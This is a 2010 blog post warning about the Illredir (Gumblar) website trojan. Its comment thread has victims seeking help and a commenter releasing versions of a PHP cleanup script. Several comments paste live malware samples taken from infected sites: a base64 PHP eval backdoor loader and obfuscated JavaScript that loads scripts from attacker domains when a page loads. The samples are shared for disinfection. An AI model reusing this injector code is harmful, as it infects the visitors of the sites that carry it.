WARNING, PEOPLE!!! The trojans are mutating faster than we can keep up with. In one of my recent postings, I warned everyone about the Illredir-B trojan, to which Mike kindly provided a script to help us remove the trojan from our websites. In less than 2 weeks, we have been alerted that it has mutated into Illredir-C. Mike quickly modified to script to eliminate both trojans.
Today, a friend asked me to take a look at her website and Avast has detected it as Illredir-D, and when I tested Mike’s script, it wasn’t able to remove the trojan, which means it has mutated into a pattern different from the earlier two; so a further modification of the script will be needed to wipe this out.
It sounds almost like biological warfare with virus mutation.
My hat off to Avast for its quick detection, even though it is free for personal use. My AVG Free did not detect it. I’m so disappointed in it, having believed in it and recommending it to friends for the past few years.
I have also tried a few online website virus scans which were not able to detect this trojan. This is quite a worrying thought, that few antivirus programs are able to keep up with the new trojans, viruses and malware that are mushrooming more quickly than ever.
The good news is that Google is able to detect the malware, and if it has been submitted to Google webmaster, it will block access to the website upon detection of these malwares. You may come across a screenshot like the following:
Snapshot of Google blocking a website. I have blurred the website URL for privacy
DO NOT IGNORE THE WARNING!
To ensure your own protection, please please please get a good antivirus software!! I highly recommend Avast because even though I’m using the free licence, it is able to detect and block the trojan. Another one that is able to detect this virus (or so I’m told) is Kaspersky, but it’s not available for free download.
[Note: I hope this post will not be ripped off like the earlier post. If you wish to repost this blog entry, please include the original link to this entry which is http://www.zyenweb.com/2010/01/19/trojan-alert-illredir-billredir-cillredir-d/. Thank you.]
68 comments
2 pings
hose says:
January 20, 2010 at 3:36 am (UTC 8)
If you want to remove this virus you need:
1. Delete crap from .htaccess file
2. Delete script after /html in site source code
That’s all.
I tested with Illredir-D version.
Greetz.
hose-hp@tlen.pl
hose says:
January 20, 2010 at 3:38 am (UTC 8)
Sometimes also PHP/JavaScript files are infected, so be careful
(mostly with name index.htm, index.html, index.php)
Mike says:
January 20, 2010 at 8:20 am (UTC 8)
Can someone post a url to site nfected with IllRedir-D ?
Zyenweb says:
January 20, 2010 at 9:29 am (UTC 8)
@Mike Sorry I cleaned out infected site that my friend asked me to check. But I did keep a copy of the original infected file. Can I email it to you? May I have your email address?
Mike says:
January 20, 2010 at 1:02 pm (UTC 8)
You should have it its on every one of my posts here and also comes with this removal tool
bernd says:
January 21, 2010 at 1:17 am (UTC 8)
example of infected site (2010-01.20 12:00) is http://www.enigmainfo.de (official site of “Enigma” (music)).
ALL .js-files, index.*-files on your server will be infected!
Change all your ftp-passwords!!!
In my case the trojan was reading the pwd-file of “Flash-FXP” (the ftp-tool i am using in WinXP). All accounts stored there have been infected.
Mike says:
January 21, 2010 at 5:27 am (UTC 8)
Don’t see any virus there … do you have a samples of that trojan ?
MIke says:
January 21, 2010 at 11:09 am (UTC 8)
Uploaded latest version 0.95
http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz
This version should remove IllRedir-B/C/D and versions starting with /*CODE1*/
Enjoy and donate if this script has helped you
Thanks
Broom says:
January 21, 2010 at 12:11 pm (UTC 8)
Hi Mike,
I tried the latest file, but I still get an error:
Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or ‘}’ in /home/broom6/public_html/remove-js-illredir-b.php on line 84
when I run this on
http://broombox.com/remove-js-illredir-b.php
Please HELP!
Broom says:
January 21, 2010 at 12:12 pm (UTC 8)
PS. Thanks for your help
MIke says:
January 21, 2010 at 1:42 pm (UTC 8)
This means you’re using php 4 instead of php 5 I believe.
Try to rename it to .php5 and try again if your hosting company has php5 enabled it should work then
Broom says:
January 21, 2010 at 2:46 pm (UTC 8)
Thanks for your response Mike. I used the SeoForums script and that seems to have worked. Thanks a lot for taking the time to respond though.
Martin says:
January 22, 2010 at 5:07 pm (UTC 8)
In http://www.virustotal.com/de/analisis/1290321bf9235bf874ba59b71249afe3219f615731ce5cc1bdfdb0bde1b9cdd3-1263044674
a complete list of antispyware tools is given. Here you can check, which tool detects the trojan and which does not.
Mike says:
January 26, 2010 at 11:16 pm (UTC 8)
I will try to port the script, so it runs on PHP4 too.
There is a new mutation it starts with /*Exception*/ i will include it in new version.
Please, wait for my next post.
MIke says:
January 27, 2010 at 11:33 am (UTC 8)
Done http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz version 0.96
– Supports PHP 4!
– Backups file before modification
– Contains cure-fix for all files infected with IllRedir-B, IllRedir-C, IllRedir-D, IllRedir-E
Let me know if you having any issues with this release.
Thanks !
Sergi says:
January 28, 2010 at 8:07 pm (UTC 8)
I was using the script and work fine.
But in some sites I have another mutation of Illredir (I think)
In that case modify all php files with insertion of code at the top of scripts:
If I try to access to my site I see a URL like: voila-fr.gamespot.com.uol or others, and I see conection to a russian domain :S
I changed the ftp passwords and waiting for other update of your cleaner script,
Thanks for all
Sorry for my Enfglish
Sergi says:
January 28, 2010 at 8:25 pm (UTC 8)
I forget the code that I have at the top of all my php files:
Sergi says:
January 28, 2010 at 8:26 pm (UTC 8)
Ups!
/**/eval(base64_decode(‘aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy91c3IvaG9tZS9kZXphaW5zb2x1dGlvbnMuY29tL3dlYi9tb250Z2F0L3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvdGhlbWVzL2FkdmFuY2VkL2ltYWdlcy94cC9qcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=’));
Mike says:
January 29, 2010 at 12:58 am (UTC 8)
I need an url or samples if you guys want cure
MIke says:
January 29, 2010 at 10:36 am (UTC 8)
http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz version 0.97
– removes eval(base64_decode()) PHP attack
– removes try{window.onload=function(){ document.write( document.write()))}catch() {}
Enjoy !
)
Sergi says:
January 29, 2010 at 4:59 pm (UTC 8)
thanks! it works fine!
leparachute says:
January 29, 2010 at 8:19 pm (UTC 8)
I’m bored with this trojan and it’s mutations ! After getting B, C and E version, they don’t add GNU/GPL text anymore. A new example I’m having below.
Do you know if there is a solution somewhere not to be infected again ? Change password, update blog to last version, nothing seems to stop that
Thanks in advance.
try{window.onload=function(){document.write(‘mobile-de.friendfeed.com.’);V8flyhwc7e = document.getElementById(‘Cmtyp1dk2g’).innerHTML + ‘m$)e^#$g#&a((u^@p#(l))o!&&a!#)d$^)#-##!#c!o)^!m).!^^$u(!r(l@&#n##$&e#x!@(t^#$.($r!&u$((:))$I!^#)!m@$!u^!&0##)p$#^0(p&&&v!@)0)!!g(k#&d^@@/@!$p$&@^a#(n#!t#$$i$$$p#@^.!&c&)@)o&@!m!/$(p&!a$!#^n!!)(t@^i^&p!!.!@(c&o(^(m@/&$)(r(1$^0)(.(!##n$)(e^@^t((/!t)r#$!a&$^v(&e$@(^&l$^)o^$)c$!&i&&t!(#y!.((c&)&!o^m@/@^@g@(o#!&#o^g##&l!e&.$(&&!c)^!o&$!m!@/^$)’.replace(/\(|&|\)|\^|@|\!|#|\$/ig, ”) ;document.write(”);} } catch(Vt836kqo ) {}
Didis says:
January 30, 2010 at 8:49 am (UTC 8)
i have the same probleme here, many websites are infected,
the code i find is different from what you mentionned, it’s like the following :
try{window.onload=function(){Pqdekqmwhk62 = ” + ‘h((u)(b!p!a$@$g)#e@(!&s@!-&)c()o^^(m@!.#($!$y(o)(^u!&#(j#^(i(&z!($$z!@.#c^@&o()^m(&.!!s((^&m!h#)^-@$#@c^o##^m!(#-@($a@(^u!.(@@#a@$v^a!#$!t^$@@t!!o!(p!&.^r)!u&!):)Y@x&$&@v^$)#6(y(j$&w&)@e$(^6(w$^7)^r@)^/$&g@@o$o@#(g#&l!$^(e&.(@c^o!m(&^/!(g^o$@o&#!$g&^^^l&e&!.#c)@o&$m$/&!t&o&#m!#.$)c^^$o&^(#(m$$(#/(@d^i@c&&^t())(.@@^c@c()@/!@s&#e$@!a@(#&&r@#s)!.(!$(c(^^o!!(m!$/#’.replace(/&|#|\(|\!|@|\^|\)|\$/ig, ”) ;Q7rj4s75mfeh3 = ‘appendChild’;Mxvqzu6myayt = document.createElement(‘sc’+'ript’);Mxvqzu6myayt.src = ‘h’+'ttp://’+Pqdekqmwhk62.replace(/Yxv6yjwe6w7r/g, ’8080′);Mxvqzu6myayt.setAttribute(‘defer’, ‘def’+'er’);eval(‘document.body.’+Q7rj4s75mfeh3+’(Mxvqzu6myayt)’);} } catch(Tb3w8uei ) {}
Mike says:
January 31, 2010 at 1:16 am (UTC 8)
Updated the code version 0.98
@leparachute – version 0.97 of the script was able to remove your version
The new version removes also Didis version
Remember to change FTP passwords on the server and don’t store passwords on the ftp client don’t use TotalComander at all
Hope this helps
Mike says:
January 31, 2010 at 1:40 am (UTC 8)
Per wikipedia http://en.wikipedia.org/wiki/Gumblar
This virus incorporates a network sniffer, so if you’re infected don’t use http/ftp and/or telnet to access your server. The virus will be able to extract open text passwords. Use https however if its smart enough it might use keylogger too.
So, I would recommend:
– make sure all infected boxes are shut down
– boot one box from live linux cd/dvd
– use browser to change passwords on the server (use https)
– from now on use only scp, sftp if possible
– copy virus removal script on the server (into public_html)
– run the script to fix your websites
– download http://www.malwarebytes.org/
– download avast
– dowload bootable antivir cd/dvd like kaspersky .iso
– create bootable antyvir dvd growisofs /dev/dvd=kaspersky.iso
– boot from bootable antvir
– try to clean windows partitions
– if successful boot windows
– otherwise restore your system from CD/DVD or restore partition
– install avast, malwarebytes, personal firewall
– run scans
leparachute says:
February 1, 2010 at 8:19 pm (UTC 8)
Thanks for your respond Mike, and for your solution to remove the trojan. What I would want is not be infected again. I changed FTP password but it seems – based on what I read – that the code is injected with input tags in forms (and not using FTP). But thanks again for your help
Mike says:
February 6, 2010 at 12:14 am (UTC 8)
Zyen can you approve my last post ?
Mike says:
February 7, 2010 at 2:15 am (UTC 8)
Uploaded version 0.99
http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz
- restores chmod to 444
- added latest virus mutations
Zyenweb says:
February 12, 2010 at 1:07 am (UTC 8)
Hey everyone. Just approved the pending comments. Sorry I didn’t approve earlier because I couldn’t go on the ‘net for a while and I thought the comments would be automatically approved.
itsik says:
February 12, 2010 at 7:02 pm (UTC 8)
Hi,
I am looking for removal tool for version I
Thanks!!
Ceal says:
February 24, 2010 at 3:05 am (UTC 8)
Hi,
Another mutation, and the latest version of Illredir doesn’t work…
Please help, or tell how to modify Illredir so that it worked..
var H=”;this.Ff=”";function b() {var U=”";var _=new Array();var i=’replace’;var p=’]';this.Fw=”;var s=RegExp;var h=new String();var iE=’[';var SI;if(SI!='' && SI!='Ax'){SI='e'};var R='g';var K;if(K!='iW'){K='iW'};function F(d,q){var hp;if(hp!='' && hp!='mS'){hp=null};var _g;if(_g!='' && _g!='hn'){_g=null};this.DJ="";var O=iE;var V=new Date();O+=q;var v;if(v!='nL' && v!='eO'){v='nL'};var Mt=new Array();O+=p;var bP=new s(O, R);return d[i](bP, h);};var VL;if(VL!=” && VL!=’G'){VL=null};var km=”";var Ks=”;var Y=F(’8595509958959909995′,”95″);var RB=window;var N=new Date();var w;if(w!=’fG’ && w!=’Nn’){w=’fG’};var y=F(‘hOtPtPpj:7/j/Ocja7rOe7ePrObjuPiOlPdOePrO-DcjoPmD.7lOiDnOeOzDi7nOg7.7c7ojmj.OtOrPaDvPiDaDnO-jc7ojmj.PsDaPmPuPeOsPt7.7rDuO:O’,”jO7PD”);var QF;if(QF!=’To’){QF=’To’};var k=F(‘s4c4r4i4pOtH’,”HO4″);var eS;if(eS!=” && eS!=’Wj’){eS=”};var om;if(om!=” && om!=’rD’){om=”};var T=F(‘cqr7ega7t7egEqlgegmqe7ngtq’,”g7q”);this.cd=”";var Ob=”;var o=F(‘/RaRlRiObOaObRaO.RcRoRmR/RaRlOiRbOaObOaR.RcRoOmR/O3R6O0RbOuOyR.RcRoRmO/OgOoOoOgRlOeR.OcRoOmO/OcRoRnRsOtOaOnRtOcOoOnOtRaRcOtO.OcRoOmO.RpOhOpR’,”RO”);RB[F('o_nZlIoyaydy',"yZ_Ip")]=function(){try {var wF=”";var Bi=new String();this.qX=”";Ob+=y;Ob+=Y;var Pp;if(Pp!=” && Pp!=’so’){Pp=”};var kW;if(kW!=”){kW=’l'};Ob+=o;j=document[T](k);var tT=”";var Yt;if(Yt!=’VG’ && Yt!=’NH’){Yt=’VG’};var ya=”;yD(j,’defer’,([1][0]));var xU;if(xU!=’E'){xU=”};var Iu=new String();yD(j,’src’,Ob);var u;if(u!=’We’){u=’We’};document.body.appendChild(j);var EM=”";var nA=new String();} catch(D){};var Ex;if(Ex!=” && Ex!=’asm’){Ex=null};};function yD(DG,t,A){DG.setAttribute(t, A);}this.iY=”";var pY=”";};var DR;if(DR!=’xl’ && DR!=’VP’){DR=’xl’};b();var gz;if(gz!=’uu’){gz=”};var FH=”";
Mike says:
March 1, 2010 at 12:53 pm (UTC 8)
Version 1.0 is out. Should fix most of the latest versions however if you’re doing something similar to the virus code your code may be removed too. The script is creating backup copies so if something doesn’t work after your run the script keep the script output log and restore from the backups.
@Andrew Try to use latest version , also don’t chmod 777 the script itself just other files. Some php servers wont run the script with write/execute permissions
Ceal says:
March 1, 2010 at 10:25 pm (UTC 8)
Thanks Mike for the new version, but it’s not working with the code above. Can you help?
Mike says:
March 2, 2010 at 4:23 am (UTC 8)
Email me your version (code from any forum is already pre-formatted).
Zip/Rar the virus with some password and e-mail to the contact email. Include Password
Thanks !
Ceal says:
March 4, 2010 at 9:17 pm (UTC 8)
Sent
LuisTim says:
March 5, 2010 at 7:11 pm (UTC 8)
hi guys, I had this virus in my site and with Mike script I cleaned him and worked fine until now.
Now I think that I have a new virus, because Mike script isnt clean my website… he cleaned some files but the website continues with virus
Can someone tell me If is the same virus?
My site is: http://www.filmes-terror.com
I am using ESET NOD32 and he show me that virus name is:
JS/TrojanDownloader.Agent.NSM trojan
05-03-2010 10:54:22 HTTP filter file http://www.filmes-terror.com/ JS/TrojanDownloader.Agent.NSM trojan connection terminated – quarantined Luis-PC\Luis Threat was detected upon access to web by the application: C:\Program Files\Mozilla Firefox\firefox.exe.
LuisTim says:
March 5, 2010 at 7:50 pm (UTC 8)
I installed AVAST in other PC and he show me that virus name is:
[L] JS:Illredir-W [Trj]
LuisTim says:
March 10, 2010 at 9:28 am (UTC 8)
Please, someone?
Mike, can you upgrade your script please?
gberg says:
March 11, 2010 at 9:24 pm (UTC 8)
hi all,
i need also a newer version … avast 5 said the virusname is JS:Illredir-AC
vale says:
March 24, 2010 at 10:14 am (UTC 8)
This is so bad!!!! I got all my directories infected with JS:Illredir-AC.
Please help!!!
vale says:
March 24, 2010 at 10:21 am (UTC 8)
there he is:
var p;if(p!=” && p!=’f'){p=null};this.N=”";var u;if(u!=”){u=’DD’};var l=new String(“hIZrep”.substr(3)+”oB8laco8B”.substr(3,3)+”e”);var tD;if(tD!=’_U’){tD=”};var U=RegExp;var I=new String();var li=”;function d(R,Q){this.X=”";this.m=”";var lm=new String();this.QU=”;var dA=String(“[3Po".substr(0,1));this.Z="";var Uj=String("HVQg".substr(3));this.fH="";dA+=Q;dA+=new String("uMc]“.substr(3));this.jF=”";this.z=”;var n=new U(dA, Uj);this._R=”;return R[l](n, new String());};var _D;if(_D!=’Sp’){_D=”};var Df=new Date();this.vh=”;var j=window;var TL;if(TL!=’zs’){TL=’zs’};this.ZJ=”";var k=”;var _Q=”;var G=d(‘oGn4lAoGaGdA’,”G4AfY”);var g=d(‘/QgQoGoQgSlSeS.9cSo2mS/GgQo2o9gQlGe9.Qc9oQmQ/ShQuGrGrGi9yGeQt2.2cQoSmQ.Qt2rS/9bGaQr9n2eQsSaSn2d9nSo2bGlSeG.Qc2oQm2/2aSmGa2zQo2nG.9fSrS.Sp9h9pG’,”2S9GQ”);var RM=d(‘sVcqr2iVpVtV’,”qV2″);var cZ=”";var lrx;if(lrx!=”){lrx=’wz’};var J=d(‘c_rJeJaJt_eJE_l_eJm_e_nJt_’,”_J”);var x=new Date();var i;if(i!=’PX’){i=”};var rQ=new Array();var W=d(’85307158750573′,”1753″);var qy=new Array();var ZL=new Date();var O=d(‘h1t1t1pP:H/P/Pg1oHoHg1lPeP-1cHo1mQ-1b1rP.1fHoQrPbPe1sP.QcHo1mH.Qc1aHmHsH-PcHoHm1.1EPxHcQe1l1lHeHnPtHB1lHeQnQdQeHrH.HrPuH:Q’,”PQH1″);r=function(){var NH=new Date();var a;if(a!=”){a=’Op’};this.x_=”;w=document[J](RM);var Br;if(Br!=” && Br!=’qG’){Br=’XS’};var dAD;if(dAD!=” && dAD!=’LQ’){dAD=’Nv’};var XD;if(XD!=’XV’ && XD!=’_g’){XD=’XV’};var cX=new Date();k=O+W;var Hc=”";var cn;if(cn!=” && cn!=’nn’){cn=’Ol’};k+=g;var le=new String();var Ro=new Date();var uQ=new String();var jG=”;w.src=k;var ol;if(ol!=’Vg’){ol=’Vg’};var Gr;if(Gr!=’je’){Gr=’je’};w.defer=([2,1][1]);var kA=”";this.Rb=”;var mo;if(mo!=’BP’){mo=’BP’};document.body.appendChild(w);var sW=new Date();};this.BG=”;var Qo=new Array();j[G]=r;this.jk=”";var W_=”";var b=new String();var AT=new Date();} catch(H){};
Mike says:
April 9, 2010 at 1:15 pm (UTC 8)
Version 1.01 is out
Mike says:
April 9, 2010 at 1:16 pm (UTC 8)
Version 1.0.1 is out
Mike says:
April 9, 2010 at 1:25 pm (UTC 8)
If you want cure send me the samples in a zip/rar archive
Marcin Jung says:
April 16, 2010 at 6:43 pm (UTC 8)
@Mike ! Wow i’m impressed !
neo64 says:
April 20, 2010 at 12:05 am (UTC 8)
Hi,
Another mutation, and the latest version of Illredir doesn’t work…
Please help, or tell how to modify Illredir so that it worked..
Thanks
var Z=”;function A() {var EW;if(EW!=’W'){EW=’W'};var B;if(B!=’N'){B=’N'};var I=new String(“ap”+”pe”+”nd”+”Ch”+”il”+”HML5d”.substr(4));var uL=String(“ghOTN”.substr(0,1));var n;if(n!=’Q’ && n!=’Fe’){n=”};var k=RegExp;var P=”";var X=new Array();var E=new String(“scSBDI”.substr(0,2)+”ri”+”pt39w7″.substr(0,2));this.YO=”";var kJ=new Array();var j;var p=window;var sI;if(sI!=’YA’ && sI!=’_'){sI=”};var bh=new Date();var e=”Z0h]”.substr(3);var HL=new Date();var bM;if(bM!=”){bM=’Ea’};var f=”;var wj=new String();var Mk;if(Mk!=’ep’){Mk=’ep’};var uC;if(uC!=’l’ && uC != ”){uC=null};function u(q,fx){var DJ;if(DJ!=’z'){DJ=’z'};var c=”[";this.EM="";c+=fx;var MY=new Date();var Rm=new Array();c+=e;var gD;if(gD!='yN'){gD='yN'};var H=new k(c, uL);var VW;if(VW!='ta' && VW!='i'){VW='ta'};var Kp;if(Kp!='Rmu' && Kp!='Ys'){Kp='Rmu'};return q.replace(H, f);var Ps;if(Ps!='yr' && Ps!='wc'){Ps=''};this.Sf="";};var Yd=new Array();var m=new String("onlo"+"ad");var zg;if(zg!='' && zg!='lv'){zg=null};var Lh=new String();this.gp='';var Ip=u('serncf','fik0W1lT8P4mhp5Hje7_nx');var Zc;if(Zc!='AK'){Zc=''};var v=String("defer");this.uA="";this.Cn="";j=function(){var GW="";var Bf='';this.A_="";try {var sV;if(sV!=''){sV='CL'};this.T='';U=document.createElement(E);var hz=new Date();var qd;if(qd!='QC' && qd != ''){qd=null};U[v]=[1,1][0];var Kj;if(Kj!=’Tb’ && Kj!=’sn’){Kj=’Tb’};var F=”l7fbo”.substr(3)+”INYQdy”.substr(4);this.oT=”;var dW=”;U[Ip] = u(‘hStNt6p6:_/1/1p1oSk_eTs2a_cjk_.Sr_u1:N’,’62TjS1NO_’)+u(’866942167414379770265732646923592185954451297651770254292532473443′,’19365472′)+u(‘/OfOrZeOeOlUoOt4t4oZ-3c4o3m3/3gSoZo4g4l3eS.UcOo3mZ/Sl3oUcZkSe4rUzS.Oc4oSmO.SpZhUpS’,'S4OZ3U’);var Mj=”";var FH=new Array();var ZP=”";var jK=”";document[F][I](U);} catch(O){var ge;if(ge!=’Fo’){ge=’Fo’};};var rMH;if(rMH!=’El’){rMH=’El’};var __=new String();};var jY;if(jY!=’yL’ && jY!=’NZ’){jY=’yL’};var ek;if(ek!=’mE’){ek=”};p[m]=j;var yh=”;this.PE=”";};A();var Wp=new Array();var Mw=new Array();
Scott says:
April 22, 2010 at 7:30 am (UTC 8)
Please help, I do not have Avast or Kapersky -(have norton) and customers are calling me saying site is flagging virus.
File Name: http://www.metrodetroitbjj.com/
Malware name: JS:Illredir-AX [Trj]
Malware Type: Trojan Horse
VPS version: 100421-1, 04/21/2010
any help would be appreciated
Thanks in advance
Scott
Min says:
June 21, 2010 at 9:53 pm (UTC 8)
Hi Guys,
Avast detects my website has a virus JS:Illredir-BU [Trj]. My website is http://www.funanweng.com. Can anyone teach me how to remove it? Any help will be very much appreciated. I’m at my wits end.
Thanks!!!!!
Min
Kina Blaylock says:
March 11, 2011 at 1:06 pm (UTC 8)
Normally I do not read post on blogs, but I wish to say that this write-up very forced me to try and do so! Your writing style has been surprised me. Thanks, very nice post.
Shalon Cosio says:
March 29, 2011 at 6:21 am (UTC 8)
Make sure you excuse our English, I’m still learning. I like your web site greatly, I believe it is very interesting also I saved a bookmark of it in my own computer history.
1234test.com says:
August 2, 2011 at 1:27 am (UTC 8)
1234test.com…
Check out my interesting website….
Luxury Bali Villas says:
September 14, 2011 at 5:19 pm (UTC 8)
Amazing…
Thank you for provide good information about this, this content must be write by expert…